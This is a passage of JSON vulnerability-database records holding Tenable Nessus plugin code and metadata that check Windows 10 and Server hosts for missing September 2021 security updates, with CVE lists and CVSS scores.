(\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005627, 5005613])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:54:48", "description": "The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. 
(CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005569: Windows 10 version 1507 LTS September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005569.NASL", "href": "https://www.tenable.com/plugins/nessus/153372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security 
Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153372);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005569\");\n script_xref(name:\"MSFT\", value:\"MS21-5005569\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005569: Windows 10 version 1507 LTS September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005569-os-build-10240-19060-0de156d8-d616-49bb-ad8d-3cf352611ca4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?322a809c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005569.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005569');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'10240',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005569])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:12", "description": "The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. 
An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. 
(CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005573.NASL", "href": "https://www.tenable.com/plugins/nessus/153377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# 
extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153377);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005573\");\n script_xref(name:\"MSFT\", value:\"MS21-5005573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005573-os-build-14393-4651-48853795-3857-4485-a2bf-f15b39464b41\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be42cfd3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005573.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005573');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005573])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:40", "description": "The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. 
(CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005568.NASL", "href": "https://www.tenable.com/plugins/nessus/153373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153373);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005568\");\n script_xref(name:\"MSFT\", value:\"MS21-5005568\");\n\n script_name(english:\"KB5005568: Windows 10 Version 1809 and Windows Server 2019 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005568.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005568-os-build-17763-2183-d19b2778-204a-4c09-a0c3-23dc28d5deac\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?54269929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005568.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 